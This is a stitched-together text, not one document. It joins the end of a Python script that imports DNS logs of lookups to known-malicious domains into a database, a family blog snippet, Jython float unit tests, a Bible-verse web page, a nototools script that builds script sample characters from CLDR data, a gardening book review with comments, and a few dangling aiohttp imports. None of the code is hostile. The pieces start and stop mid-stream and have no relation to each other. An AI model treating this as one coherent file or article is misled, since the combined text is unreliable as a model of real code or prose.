    return ip, ip_numeric


# Load all malicious domains from database into dictionary object for quick lookup
def load_domains():
    global domains
    query = "SELECT domain_id, domain_name from domain where domain_is_malicious > 0"
    try:
        cursor.execute(query)
    except AttributeError:
        # cursor is still None: connect on first use
        logger.debug('no connection to db. calling connect_db')
        connect_db()
        cursor.execute(query)
    res = cursor.fetchall()
    for record in res:
        domains[record[1].lower()] = int(record[0])


# Get domain_id for a malicious domain.
# Returns -1 if domain is not marked malicious in database.
def get_domain_id(domain):
    global domains
    if len(domains) == 0:
        load_domains()
    domain = domain.lower()
    if not domain in domains:
        return -1
    domain_id = domains[domain]
    return domain_id


# Returns source id for the named source
def get_src_id(src):
    global src_id
    # If the source id was previously looked up return the locally saved value
    if src_id >= 0:
        return src_id
    # Look up the id by source name
    query = 'select named_src_id from named_src where named_src_name=%s'
    try:
        cursor.execute(query, (src,))
    except (AttributeError, MySQLdb.OperationalError):
        # fixed: this previously called the non-existent db_connect()
        connect_db()
        cursor.execute(query, (src,))
    res = cursor.fetchone()
    # Source was not in database:
    # insert the source and return the new id
    if res == None:
        query = 'insert into named_src set named_src_name=%s'
        cursor.execute(query, (src,))
        conn.commit()
        src_id = int(cursor.lastrowid)
    # Source was in database: save id for faster lookup
    else:
        src_id = int(res[0])
    return src_id


def proc_line(line):
    """Convert one raw log line into a csv import row, or -1 to skip it."""
    # split line on spaces
    l = line.split()
    # check if the line corresponds to a dns resolution
    if is_dns_resolution(l):
        # get id for malicious domain
        dm_id = get_domain_id(l[9])
        # If domain has id keep processing else skip record (return -1)
        if dm_id > -1:
            # Get ip and ip numeric
            ip, ip_numeric = get_ip(l[6])
            # If ip in whitelist skip record (return -1) else keep processing
            if ip not in whitelisted_ips:
                date = get_date(l)
                src_id = get_src_id(src)
                # return string formatted for import
                return ','.join(str(x) for x in [date, ip, ip_numeric, dm_id, src_id])
    # Indicate record will not be included in the import (skip record)
    return -1


# read gzipped log file line by line and write to files for archive and import
def proc_file(filepath, archive_filepath, chunk_filepath_template, chunksize):
    logger.debug('processing file: {0}'.format(filepath))
    logger.debug('chunk size: {0}'.format(chunksize))
    count = 0
    fnumber = 0
    chunk = ''
    # open gzipped log file
    fin = gzip.open(filepath, 'r')
    for l in fin:
        res = proc_line(l)
        # If proc_line returned a formatted line and the line is unique
        if res != -1 and is_unique(res):
            # add line to chunk variable and inc counter
            chunk += res+'\n'
            count += 1
            # When chunk reaches the target chunksize write to files
            if count % chunksize == 0:
                chunk_filepath = chunk_filepath_template.format(fnumber)
                write_data(chunk, archive_filepath, chunk_filepath)
                fnumber += 1
                chunk = ''
    # If there is a partial chunk at the end write it to files
    if chunk != '':
        chunk_filepath = chunk_filepath_template.format(fnumber)
        write_data(chunk, archive_filepath, chunk_filepath)
        fnumber += 1
    fin.close()
    logger.info('{0} records written to {1} chunk files'.format(count, fnumber))
    return fnumber


# writes chunks to archive(gzipped) file and chunk file
def write_data(data, archive_filepath, chunk_filepath):
    if archive:
        logger.debug('writing to archive file: {0}'.format(archive_filepath))
        archivefile = gzip.open(archive_filepath, 'a')
        archivefile.write(data)
        archivefile.close()
    logger.debug('writing to chunk file: {0}'.format(chunk_filepath))
    with open(chunk_filepath, 'w') as chunkfile:
        chunkfile.write(data)


# Import chunk files into database one file at a time.
# chunks is a list of numbers corresponding to a chunkfile.
# chunk_filepath_template is a string that will produce the
# full file path of the chunk file when given the chunk number.
def import_chunks(chunks, chunk_filepath_template):
    query = "load data local infile %s into table named_resolution fields terminated by ',' lines terminated by '\n' " + \
            "(named_resolution_datetime,named_resolution_src_ip,named_resolution_src_ip_numeric,domain_id, named_src_id)"
    for i in chunks:
        logger.info('importing chunk: {0:03d}'.format(i))
        try:
            cursor.execute(query, (chunk_filepath_template.format(i),))
            conn.commit()
        except AttributeError:
            # cursor is still None: connect and retry once
            logger.debug('no connection to db. calling connect_db')
            connect_db()
            cursor.execute(query, (chunk_filepath_template.format(i),))
            conn.commit()
        except Exception:
            logger.error('import chunks error', exc_info=True)
            raise
        logger.info('importing chunk complete.')


# Deletes chunk files.
# chunks is a list of numbers corresponding to a chunkfile.
# chunk_filepath_template is a string that will produce the
# full file path of the chunk file when given the chunk number.
def delete_chunks(chunks, chunk_filepath_template):
    logger.info("Cleaning up chunk files.")
    for i in chunks:
        chunk_filepath = chunk_filepath_template.format(i)
        logger.debug('removing file: {0}'.format(chunk_filepath))
        os.remove(chunk_filepath)


if __name__ == '__main__':
    logger.info('named.py starting')
    # Set paths for archive and chunk directories
    archive_dir = named_dir+'archive/'+src+'/'
    chunk_dir = named_dir+'chunks/'+src+'/'
    # Make sure the directories exist
    try:
        os.makedirs(archive_dir)
    except OSError:
        logger.debug('dir exists:{0}'.format(archive_dir))
    try:
        os.makedirs(chunk_dir)
    except OSError:
        logger.debug('dir exists:{0}'.format(chunk_dir))
    # for each file in the to_load directory that is from the source defined in the config
    #  - Process file and create chunk files and archive file
    #  - Import the chunkfiles into database
    #  - Delete chunkfiles
    #  - Delete original file
    files_to_load = glob.glob(named_dir+'to_load/{0}/*.{0}.log.gz'.format(src))
    if len(files_to_load) == 0:
        logger.warning('No files to load. Exiting')
        sys.exit(0)
    logger.debug('files to load: {0}'.format(files_to_load))
    for f in files_to_load:
        # reset per-file dedup state
        uniq_set = set()
        filepath = f
        basename = os.path.basename(f).split('.log.gz')[0]
        chunk_filepath_template = chunk_dir+basename+'.{0}.csv'
        archive_filepath = archive_dir+basename+'.csv.gz'
        num_chunks = proc_file(filepath, archive_filepath, chunk_filepath_template, chunksize)
        import_chunks(xrange(num_chunks), chunk_filepath_template)
        delete_chunks(xrange(num_chunks), chunk_filepath_template)
        os.remove(f)
    # conn stays None if every file produced zero chunks; guard the close
    if conn is not None:
        conn.close()
    logger.info('named.py complete')
The weather may not be cooperating with the concept of "spring," but we have been very busy here. We have made several day trips, visited favorite places and new places, seen friends, gone to the dentist... you know, spring stuff. Nate had his 6-month check-up with the dentist — no cavities! He also went to the Franklin Institute for the first time.
"""Float tests Made for Jython. """ import math import sys import unittest from test import test_support jython = test_support.is_jython class FloatTestCase(unittest.TestCase): def test_float_repr(self): self.assertEqual(repr(12345678.000000005), '12345678.000000006') self.assertEqual(repr(12345678.0000000005), '12345678.0') self.assertEqual(repr(math.pi**-100), jython and '1.9275814160560203e-50' or '1.9275814160560206e-50') self.assertEqual(repr(-1.0), '-1.0') self.assertEqual(repr(-9876.543210), jython and '-9876.54321' or '-9876.5432099999998') self.assertEqual(repr(0.123456789e+35), '1.23456789e+34') def test_float_str(self): self.assertEqual(str(12345678.000005), '12345678.0') self.assertEqual(str(12345678.00005), jython and '12345678.0' or '12345678.0001') self.assertEqual(str(12345678.00005), jython and '12345678.0' or '12345678.0001') self.assertEqual(str(12345678.0005), '12345678.0005') self.assertEqual(str(math.pi**-100), '1.92758141606e-50') self.assertEqual(str(0.0), '0.0') self.assertEqual(str(-1.0), '-1.0') self.assertEqual(str(-9876.543210), '-9876.54321') self.assertEqual(str(23456789012E666), 'inf') self.assertEqual(str(-23456789012E666), '-inf') def test_float_str_formatting(self): self.assertEqual('%.13g' % 12345678.00005, '12345678.00005') self.assertEqual('%.12g' % 12345678.00005, jython and '12345678' or '12345678.0001') self.assertEqual('%.11g' % 12345678.00005, '12345678') # XXX: The exponential formatter isn't totally correct, e.g. 
our # output here is really .13g self.assertEqual('%.12g' % math.pi**-100, '1.92758141606e-50') self.assertEqual('%.5g' % 123.005, '123') self.assertEqual('%#.5g' % 123.005, '123.00') self.assertEqual('%#g' % 0.001, '0.00100000') self.assertEqual('%#.5g' % 0.001, '0.0010000') self.assertEqual('%#.1g' % 0.0001, '0.0001') self.assertEqual('%#.4g' % 100, '100.0') self.assertEqual('%#.4g' % 100.25, '100.2') self.assertEqual('%g' % 0.00001, '1e-05') self.assertEqual('%#g' % 0.00001, '1.00000e-05') self.assertEqual('%e' % -400.0, '-4.000000e+02') self.assertEqual('%.2g' % 99, '99') self.assertEqual('%.2g' % 100, '1e+02') def test_overflow(self): shuge = '12345' * 120 shuge_float = float(shuge) shuge_int = int(shuge) self.assertRaises(OverflowError, float, shuge_int) self.assertRaises(OverflowError, int, shuge_float) # and cmp should not overflow self.assertNotEqual(0.1, shuge_int) def test_nan(self): nan = float('nan') self.assert_(type(nan), float) if jython: # support Java syntax self.assert_(type(float('NaN')), float) # CPython 2.4/2.5 allow this self.assertEqual(long(nan), 0) self.assertNotEqual(nan, float('nan')) self.assertNotEqual(nan, nan) self.assertEqual(cmp(nan, float('nan')), 1) self.assertEqual(cmp(nan, nan), 0) for i in (-1, 1, -1.0, 1.0): self.assertEqual(cmp(nan, i), -1) self.assertEqual(cmp(i, nan), 1) def test_infinity(self): self.assert_(type(float('Infinity')), float) self.assert_(type(float('inf')), float) self.assertRaises(OverflowError, long, float('Infinity')) def test_float_none(self): self.assertRaises(TypeError, float, None) def test_pow(self): class Foo(object): def __rpow__(self, other): return other ** 2 # regression in 2.5 alphas self.assertEqual(4.0 ** Foo(), 16.0) def test_faux(self): class F(object): def __float__(self): return 1.6 self.assertEqual(math.cos(1.6), math.cos(F())) def test_main(): test_support.run_unittest(FloatTestCase) if __name__ == '__main__': test_main()
Home » Bible Verses by Topic » Bible Verses about Peace (3) What Does the Bible Say about Peace? 63. For when they shall say, Peace and safety; then sudden destruction cometh upon them, as travail upon a woman with child; and they shall not escape. 1 Thessalonians 5:3 Bible Verses about Peace (3) What Does the Bible Say about Peace?
#!/usr/bin/env python
#
# Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""Generates script-specific samples (collections of chars) using cldr
exemplar data for languages written in a script."""

import argparse
import codecs
import collections
import locale
import os
from functools import cmp_to_key
from os import path

from nototools.py23 import unichr
from nototools import cldr_data
from nototools import create_image
from nototools import extra_locale_data
from nototools import tool_utils
from nototools import unicode_data

try:
    from icu import Locale, Collator

    print("will use icu locale-specific order")
    _HAVE_ICU = True
except ImportError as e:
    print("will use default locale sort order")
    _HAVE_ICU = False

NOTO_TOOLS = path.abspath(path.join(path.dirname(__file__), os.pardir))

CLDR_DIR = path.join(NOTO_TOOLS, "third_party", "cldr")

_VERBOSE = False


def get_script_to_exemplar_data_map():
    """Return a map from script to 3-tuples of:
    - locale tuple (lang, script, region, variant)
    - cldr_relative path to src of exemplar data
    - tuple of the exemplar chars"""

    script_map = collections.defaultdict(dict)
    for directory in ["common", "seed", "exemplars"]:
        data_dir = path.join(directory, "main")
        for filename in os.listdir(path.join(CLDR_DIR, data_dir)):
            if not filename.endswith(".xml"):
                continue

            exemplar_list = cldr_data.get_exemplar_from_file(
                path.join(data_dir, filename)
            )
            if not exemplar_list:
                if _VERBOSE:
                    print("  no exemplar list for %s" % path.join(data_dir, filename))
                continue

            lsrv = cldr_data.loc_tag_to_lsrv(filename[:-4])
            if not lsrv:
                if _VERBOSE:
                    print("  no lsrv for %s" % path.join(data_dir, filename))
                continue
            src = path.join(directory, filename)
            script = lsrv[1]
            if not script:
                if _VERBOSE:
                    print("  no script for %s" % path.join(data_dir, filename))
                continue

            loc_tag = cldr_data.lsrv_to_loc_tag(lsrv)
            loc_to_exemplar_info = script_map[script]
            if loc_tag in loc_to_exemplar_info:
                if _VERBOSE:
                    print(
                        "skipping %s, already have exemplars for %s from %s"
                        % (src, loc_tag, loc_to_exemplar_info[loc_tag][1])
                    )
                continue

            # fix exemplars that look incorrect
            if script == "Arab" and "d" in exemplar_list:
                if _VERBOSE:
                    print("found 'd' in %s for %s" % (src, lsrv))
                no_latin = True
            else:
                no_latin = False

            # exclude exemplar strings, and restrict to letters and digits
            def accept_cp(cp):
                if len(cp) != 1:
                    return False
                cat = unicode_data.category(cp)
                if cat[0] != "L" and cat != "Nd":
                    return False
                if no_latin and cp in "df":
                    return False
                return True

            # list(): filter() is a one-shot iterator on python 3
            filtered_exemplar_list = list(filter(accept_cp, exemplar_list))

            # some exemplar lists don't surround strings with curly braces, and end up
            # with duplicate characters.  Flag these
            exemplar_chars = set()
            dup_chars = set()
            fixed_exemplar_list = []
            for cp in filtered_exemplar_list:
                if cp in exemplar_chars:
                    dup_chars.add(cp)
                else:
                    exemplar_chars.add(cp)
                    fixed_exemplar_list.append(cp)
            if len(dup_chars) > 0 and _VERBOSE:
                print(
                    "duplicate exemplars in %s: %s"
                    % (
                        src,
                        ", ".join(
                            [u"\u200e%s\u200e (%x)" % (cp, ord(cp)) for cp in dup_chars]
                        ),
                    )
                )
            loc_to_exemplar_info[loc_tag] = (lsrv, src, tuple(fixed_exemplar_list))

    # supplement with extra locale data
    for loc_tag in extra_locale_data.EXEMPLARS:
        exemplar_list = cldr_data.get_exemplar_from_extra_data(loc_tag)
        lang, script = loc_tag.split("-")
        lsrv = (lang, script, None, None)
        loc_to_exemplar_info = script_map[script]
        src = "[extra locale data]/%s" % loc_tag
        if loc_tag in loc_to_exemplar_info:
            if _VERBOSE:
                print(
                    "skipping %s, already have exemplars for %s from %s"
                    % (src, loc_tag, loc_to_exemplar_info[loc_tag][1])
                )
            continue

        # restrict to letters, except for zsym
        def accept_cp(cp):
            cat = unicode_data.category(cp)
            return cat[0] == "L" or cat == "Nd"

        if "Zsym" not in loc_tag:
            # list() so len() works below (filter() has no len on python 3)
            filtered_exemplar_list = list(filter(accept_cp, exemplar_list))
            if len(filtered_exemplar_list) != len(exemplar_list) and _VERBOSE:
                print("filtered some characters from %s" % src)
        else:
            filtered_exemplar_list = exemplar_list
        loc_to_exemplar_info[loc_tag] = (lsrv, src, tuple(filtered_exemplar_list))

    return script_map


def show_rarely_used_char_info(script, loc_map, char_to_lang_map):
    """Diagnostic dump: per locale, which exemplars are unique to it or
    shared with only one or two other languages of the same script."""
    # let's list chars unique to each language
    for loc_tag in sorted(loc_map):
        unique_chars = []
        dual_chars = []
        dual_shared_with = set()
        triple_chars = []
        triple_shared_with = set()
        info = loc_map[loc_tag]
        exemplars = info[2]
        for cp in exemplars:
            num_common_langs = len(char_to_lang_map[cp])
            if num_common_langs == 1:
                unique_chars.append(cp)
            elif num_common_langs == 2:
                dual_chars.append(cp)
                for shared_loc_tag in char_to_lang_map[cp]:
                    if shared_loc_tag != loc_tag:
                        dual_shared_with.add(shared_loc_tag)
            elif num_common_langs == 3:
                triple_chars.append(cp)
                for shared_loc_tag in char_to_lang_map[cp]:
                    if shared_loc_tag != loc_tag:
                        triple_shared_with.add(shared_loc_tag)

        script_tag = "-" + script
        if unique_chars:
            print(
                "%s has %d unique chars: %s%s"
                % (
                    loc_tag,
                    len(unique_chars),
                    " ".join(unique_chars[:100]),
                    "..." if len(unique_chars) > 100 else "",
                )
            )
        if dual_chars:
            print(
                "%s shares %d chars (%s%s) with 1 other lang: %s"
                % (
                    loc_tag,
                    len(dual_chars),
                    " ".join(dual_chars[:20]),
                    "..." if len(dual_chars) > 20 else "",
                    ", ".join(
                        sorted(
                            [loc.replace(script_tag, "") for loc in dual_shared_with]
                        )
                    ),
                )
            )
        if triple_chars:
            print(
                "%s shares %d chars (%s%s) with 2 other langs: %s"
                % (
                    loc_tag,
                    len(triple_chars),
                    " ".join(triple_chars[:20]),
                    "..." if len(triple_chars) > 20 else "",
                    ", ".join(
                        sorted(
                            [loc.replace(script_tag, "") for loc in triple_shared_with]
                        )
                    ),
                )
            )
        if not (unique_chars or dual_chars or triple_chars):
            print("%s shares all chars with 3+ other langs" % loc_tag)


def get_char_to_lang_map(loc_map):
    """Invert loc_map: map each exemplar char to the list of locale tags
    whose exemplars contain it."""
    char_to_lang_map = collections.defaultdict(list)
    for loc_tag in sorted(loc_map):
        info = loc_map[loc_tag]
        exemplars = info[2]
        for cp in exemplars:
            if loc_tag in char_to_lang_map[cp]:
                print(
                    "loc %s (from %s) already in char_to_lang_map for %s (%x)"
                    % (loc_tag, info[1], cp, ord(cp))
                )
            else:
                char_to_lang_map[cp].append(loc_tag)
    return char_to_lang_map


def char_lang_info(num_locales, char_to_lang_map):
    """Returns a tuple containing
    - characters ordered by the number of langs that use them
    - a list mapping number of shared langs to number of chars shared by those
      langs"""
    freq_list = []
    hist = [0] * (num_locales + 1)
    for cp in char_to_lang_map:
        num_shared_langs = len(char_to_lang_map[cp])
        freq_list.append((num_shared_langs, cp))
        if num_shared_langs >= len(hist):
            # More languages claim this char than there are locales --
            # indicates duplicated locale data upstream.  (A debug loop here
            # used to reference an undefined 'loc_map' and raised NameError,
            # and the unconditional hist increment then raised IndexError.)
            print(
                "num shared langs is %d but size of hist is %d"
                % (num_shared_langs, len(hist))
            )
        else:
            hist[num_shared_langs] += 1
    freq_list.sort()
    return [cp for nl, cp in freq_list], hist


def show_char_use_info(script, chars_by_num_langs, char_to_lang_map):
    """Diagnostic dump: for each char, how many and which locales use it."""
    script_tag = "-" + script
    for cp in chars_by_num_langs:
        langs = char_to_lang_map[cp]
        count = len(langs)
        limit = 12
        without_script = [loc.replace(script_tag, "") for loc in langs[:limit]]
        without_script_str = ", ".join(sorted(without_script))
        if count > limit:
            without_script_str += "..."
        print(u"char %s\u200e (%x): %d %s" % (cp, ord(cp), count, without_script_str))
    print("total chars listed: %d" % len(char_to_lang_map))


def show_shared_langs_hist(hist):
    # histogram - number of chars per number of shared languages
    for i in range(1, len(hist)):
        print("[%3d] %3d %s" % (i, hist[i], "x" * hist[i]))


def get_upper_case_list(char_list):
    """Return the upper case versions where they differ.

    If no char in the list is a lower case variant, the result is empty."""
    # keep in same order as input list.
    upper_case_chars = []
    for cp in char_list:
        upcp = unicode_data.to_upper(cp)
        if upcp != cp:
            upper_case_chars.append(upcp)
    return upper_case_chars


def show_tiers(char_list, num_tiers, tier_size):
    """Diagnostic dump: slice the most-shared end of char_list into tiers of
    tier_size chars each and print them (with upper-case variants)."""
    for tier in range(1, num_tiers + 1):
        if tier == 1:
            subset = char_list[-tier_size:]
        else:
            subset = char_list[tier * -tier_size : (tier - 1) * -tier_size]
        if not subset:
            break
        tier_chars = sorted(subset)
        print("tier %d: %s" % (tier, " ".join(tier_chars)))

        upper_case_chars = get_upper_case_list(tier_chars)
        if upper_case_chars:
            print(" upper: " + " ".join(upper_case_chars))


def get_rare_char_info(char_to_lang_map, shared_lang_threshold):
    """Returns a tuple of:
    - a set of 'rare_chars' (those used threshold langs or fewer),
    - a mapping from each locale with rare chars to a set of its rare chars"""

    rare_chars = set()
    locs_with_rare_chars = collections.defaultdict(set)
    for cp in char_to_lang_map:
        num_shared_langs = len(char_to_lang_map[cp])
        if num_shared_langs <= shared_lang_threshold:
            rare_chars.add(cp)
            for lang_tag in char_to_lang_map[cp]:
                locs_with_rare_chars[lang_tag].add(cp)
    return rare_chars, locs_with_rare_chars


_lang_for_script_map = {}


def _init_lang_for_script_map():
    """Populate _lang_for_script_map with the highest-literate-population
    language for each script."""
    locs_by_lit_pop = [
        loc for _, loc in cldr_data.get_lang_scrs_by_decreasing_global_lit_pop()
    ]
    for t in locs_by_lit_pop:
        lsrv = cldr_data.loc_tag_to_lsrv(t)
        script = lsrv[1]
        if script not in _lang_for_script_map:
            lang = lsrv[0]
            # print('%s lang => %s' % (script, lang))
            _lang_for_script_map[script] = lang


def lang_for_script(script):
    """Return the most common language for a script based on literate
    population."""
    # should use likely subtag data for this.
    # the current code assumes all we want is lang -> script, I'd have to change
    # it to map locale->locale.  Right now I dont' get Hant -> zh_Hant, only
    # Hant -> zh, which isn't good enough I think.
    if not _lang_for_script_map:
        _init_lang_for_script_map()
    return _lang_for_script_map.get(script)


def select_rare_chars_for_loc(
    script, locs_with_rare_chars, shared_lang_threshold, char_to_lang_map
):
    """Return a list of 2-tuples of loc and selected rare chars,
    ordered by decreasing literate population of the locale."""

    rarity_threshold_map = {}
    for lang_tag in locs_with_rare_chars:
        rarity_threshold_map[lang_tag] = shared_lang_threshold

    selected = []
    locs_by_lit_pop = [
        loc for _, loc in cldr_data.get_lang_scrs_by_decreasing_global_lit_pop()
    ]
    # examine locales in decreasing order of literate population
    for loc_tag in locs_by_lit_pop:
        if script not in loc_tag:
            continue
        loc_tag = loc_tag.replace("_", "-")
        if loc_tag not in locs_with_rare_chars:
            continue
        most_specific_chars = set()
        most_specific_chars_count = rarity_threshold_map[loc_tag]
        # From the rare chars for this locale, select those that
        # are most specific to this language. In most cases they
        # are unique to this language.
        for cp in locs_with_rare_chars[loc_tag]:
            num_chars = len(char_to_lang_map[cp])
            if num_chars <= most_specific_chars_count:
                if num_chars < most_specific_chars_count:
                    most_specific_chars = set()
                most_specific_chars.add(cp)
                most_specific_chars_count = num_chars
        if most_specific_chars:
            selected.append((loc_tag, most_specific_chars))
            for cp in most_specific_chars:
                for tag in char_to_lang_map[cp]:
                    if rarity_threshold_map[tag] > most_specific_chars_count:
                        rarity_threshold_map[tag] = most_specific_chars_count
    return selected


def show_selected_rare_chars(selected):
    print("langs with rare chars by lang pop:")
    for lang_tag, chars in selected:
        print("%10s: %s" % (lang_tag, ", ".join(sorted(chars))))


def sort_for_script(cp_list, script):
    """Sort chars using the collation of the script's most common language,
    falling back to the process locale when ICU is unavailable."""
    lang = lang_for_script(script)
    if not lang:
        print("cannot sort for script, no lang for %s" % script)
        return cp_list
    if _HAVE_ICU:
        from icu import Locale, Collator

        loc = Locale(lang + "_" + script)
        col = Collator.createInstance(loc)
        # sorted() lost its cmp= parameter in python 3; adapt the
        # comparator with functools.cmp_to_key instead
        return sorted(cp_list, key=cmp_to_key(col.compare))
    else:
        import locale

        return sorted(cp_list, key=cmp_to_key(locale.strcoll))


def addcase(sample, script):
    """Append a line of upper-case variants to *sample* when any exist."""
    cased_sample = []
    for cp in sample:
        ucp = unicode_data.to_upper(cp)
        if ucp != cp and ucp not in sample:  # Copt has cased chars paired in the block
            cased_sample.append(ucp)
    if cased_sample:
        cased_sample = " ".join(cased_sample)
        if _VERBOSE:
            print("add case for %s" % script)
        return sample + "\n" + cased_sample
    return sample


def _generate_excluded_characters():
    # Some of these exclusions are desired, and some are reluctantly applied because
    # Noto currently does not support some characters.  We use the generated
    # data as fallback samples on a per-script and not per-font basis, which is also
    # a problem.

    # Religious characters
    # deva OM, Arabic pbuh, bismillah
    codepoints = [0x950, 0xFDFA, 0xFDFD]

    # Cyrillic characters not in sans or serif
    codepoints.append(0x2E2F)
    for cp in range(0xA640, 0xA680):
        codepoints.append(cp)

    # Arabic character not in kufi
    codepoints.append(0x08A0)

    chars = set()
    for cp in codepoints:
        chars.add(unichr(cp))
    return frozenset(chars)


_EXCLUDE_CHARS = _generate_excluded_characters()


def generate_sample_for_script(script, loc_map):
    """Build the (sample, info) pair for one script from its locale map."""
    num_locales = len(loc_map)

    if num_locales == 1:
        # iter() needed: dict views are not iterators on python 3
        tag, info = next(iter(loc_map.items()))
        exemplars = info[2]
        ex_len = len(exemplars)
        info = "%s (1 locale)\nfrom exemplars for %s (%s%d chars)" % (
            script,
            tag,
            "first 60 of " if ex_len > 60 else "",
            ex_len,
        )
        # don't sort, rely on exemplar order
        sample = " ".join(exemplars[:60])
        sample = addcase(sample, script)
        return sample, info

    script_tag = "-" + script

    char_to_lang_map = get_char_to_lang_map(loc_map)
    if len(char_to_lang_map) <= 60:
        info = "%s (%d locales)\nfrom merged exemplars (%d chars) from %s" % (
            script,
            num_locales,
            len(char_to_lang_map),
            ", ".join([loc.replace(script_tag, "") for loc in loc_map]),
        )
        sample = " ".join(sort_for_script(list(char_to_lang_map), script))
        sample = addcase(sample, script)
        return sample, info

    # show_rarely_used_char_info(script, loc_map, char_to_lang_map)

    chars_by_num_langs, num_langs_to_num_chars = char_lang_info(
        num_locales, char_to_lang_map
    )

    # show_char_use_info(chars_by_num_langs, char_to_lang_map)
    # show_shared_langs_hist(num_langs_to_num_chars)
    # show_tiers(chars_by_num_langs, 3, 40)

    shared_lang_threshold = min(7, num_locales)
    rare_chars, locs_with_rare_chars = get_rare_char_info(
        char_to_lang_map, shared_lang_threshold
    )

    selected = select_rare_chars_for_loc(
        script, locs_with_rare_chars, shared_lang_threshold, char_to_lang_map
    )

    # show_selected_rare_chars(selected)
    chars_by_num_langs = [cp for cp in chars_by_num_langs if cp not in _EXCLUDE_CHARS]

    chosen_chars = list(chars_by_num_langs)[-60:]
    rare_extension = []
    for _, chars in selected:
        avail_chars = [
            cp
            for cp in chars
            if cp not in chosen_chars
            and cp not in rare_extension
            and cp not in _EXCLUDE_CHARS
        ]
        rare_extension.extend(
            sorted(avail_chars)[:4]
        )  # vietnamese dominates latin otherwise
        if len(rare_extension) > 20:
            break
    chosen_chars = chosen_chars[: 60 - len(rare_extension)]
    chosen_chars.extend(rare_extension)
    info = (
        "%s (%d locales)\n"
        "from most common exemplars plus chars specific to most-read languages"
        % (script, num_locales)
    )
    sample = " ".join(sort_for_script(chosen_chars, script))
    sample = addcase(sample, script)
    return sample, info


def generate_samples(dstdir, imgdir, summary):
    """Generate per-script samples; optionally write text files, png images,
    and/or print a summary."""
    if imgdir:
        imgdir = tool_utils.ensure_dir_exists(imgdir)
        print("writing images to %s" % imgdir)

    if dstdir:
        dstdir = tool_utils.ensure_dir_exists(dstdir)
        print("writing files to %s" % dstdir)

    script_map = get_script_to_exemplar_data_map()
    for script in sorted(script_map):
        sample, info = generate_sample_for_script(script, script_map[script])
        if summary:
            print()
            print(info)
            print(sample)

        if imgdir:
            # renamed from 'path' to avoid shadowing the os.path alias
            img_path = os.path.join(imgdir, "und-%s_chars.png" % script)
            print("writing image %s.png" % script)
            rtl = script in ["Adlm", "Arab", "Hebr", "Nkoo", "Syrc", "Tfng", "Thaa"]
            create_image.create_png(
                sample, img_path, font_size=34, line_spacing=40, width=800, rtl=rtl
            )

        if dstdir:
            filename = "und-%s_chars.txt" % script
            print("writing data %s" % filename)
            filepath = os.path.join(dstdir, filename)
            with codecs.open(filepath, "w", "utf-8") as f:
                f.write(sample + "\n")


def main():
    default_dstdir = os.path.join(NOTO_TOOLS, "sample_texts")

    parser = argparse.ArgumentParser()
    parser.add_argument(
        "--dstdir",
        help="where to write samples (default %s)" % default_dstdir,
        default=default_dstdir,
        metavar="dir",
    )
    parser.add_argument(
        "--imgdir", help="if defined, generate images in this dir", metavar="dir"
    )
    parser.add_argument(
        "--save", help="write sample files in dstdir", action="store_true"
    )
    parser.add_argument(
        "--summary",
        help="output list of samples and how they were generated",
        action="store_true",
    )
    parser.add_argument(
        "--verbose", help="print warnings and extra info", action="store_true"
    )
    args = parser.parse_args()

    if not args.save and not args.imgdir and not args.summary:
        print("nothing to do.")
        return

    if args.verbose:
        global _VERBOSE
        _VERBOSE = True

    generate_samples(args.dstdir if args.save else None, args.imgdir, args.summary)


if __name__ == "__main__":
    locale.setlocale(locale.LC_COLLATE, "en_US.UTF-8")
    main()
It is always with delight and honour to receive a request to review a book, especially when connected with gardening. I was more than happy to say “yes please” when The Arum Publishing Group asked me to review Louise Curley’s book, The Cut Flower Patch. I follow Louise’s blog, the WellyWoman, so know of her love for plants and nature. Indeed on her “About Me” page she writes: “For some women, they’re happiest when their feet are ensconced in a pair of expensive Manolo Blahniks or Christian Louboutins, for me it’s a pair of mud-splattered wellies”. The Cut Flower Patch is her first book, due to be published by Frances Lincoln (www.franceslincoln.com | @Frances_Lincoln) on 6 March 2014, so I am privileged to have a preview. The Cut Flower Patch measures 19cms x 24cms and is a sensible sized book. My first impressions were matt textured cover and the size and font of the print, which is easy on the eye and I found comfortable to read. The next thing was the matt format and attractive photographs of varying sizes including full page photographs with mouthwatering ideas for displaying flowers. The colour reproduction is excellent making it a lovely book to look at. This is a comprehensive guide for anyone wanting to grow their own cut flowers, whether it be in a small raised bed or on an allotment. It takes you from the preparation of a site to plant layouts and a guide to annuals, biennials, bulbs, tubers and foliage, as well as detailed information and photos setting you on the path of starting off the growing of your flowers from the windowsill to sowing direct. Louise includes a chapter through the seasons with ideas on supplementing the cutting patch; particularly useful in the winter months. There is a beautiful full page photograph for winter with twigs of Viburnum Bodnantense “Dawn” displayed in an assortment of glass bottles which has made me hunt out some old bottles. Equally important to growing your own flowers is knowing the best way to show them off. 
As one would expect in a good book about cutting flowers, there is an informative chapter called ‘Arranging your Flowers’ with floristry guides and tips, supported again by a wealth of photos of beautiful flowers in an interesting assortment of jugs, jars and vases. One that caught my eye was a pewter tankard packed full of Scabious, Sweet Williams and grasses. Good maintenance, support ideas, feeding suggestions, including a recipe for Comfrey, and dealing with pests and diseases in an organic way are well covered. Louise also gives advice on the best way to cut your flowers to encourage further blooms and prepare them so that they last longer. Finally at the end of the book is the always useful sowing and planting calendar and cutting patch calendar. Try as I may, in order to give a well rounded review, I was unable to find anything about The Cut Flower Patch that I did not like. I am going to covet my copy because I know I will refer to it throughout the year for ideas and help. You can place an early order for your own copy, which I would thoroughly recommend. The Cut Flower Patch is published on 6 March 2014. To order The Cut Flower Patch at the discounted price of £16.00 including p&p* (RRP: £16.00), telephone 01903 828503 or email mailorders@lbsltd.co.uk and quote the offer code APG101. Please quote the offer code APG101 and include your name and address details. Posted on February 21, 2014 February 21, 2014 by Ronnie@Hurtledto60Posted in Book Review, Garden bloggingTagged Book Review, Louise Curley, The Cut Flower Patch. Thank you so much for your lovely review of my book. After all the hard work it really means a lot that you liked it so much. I am glad to find you blogging again and have just been catching up. How great to get a review copy of this book! It looks and sounds like my kind of thing. I have rather lost touch with the garden after a torrid winter (not quite like yours, not my health but my father’s and the sudden death of my mother). 
Perhaps I should try to re-engage.
import json

from aiohttp import ClientSession, CookieJar
from asyncio import CancelledError, Queue, get_event_loop
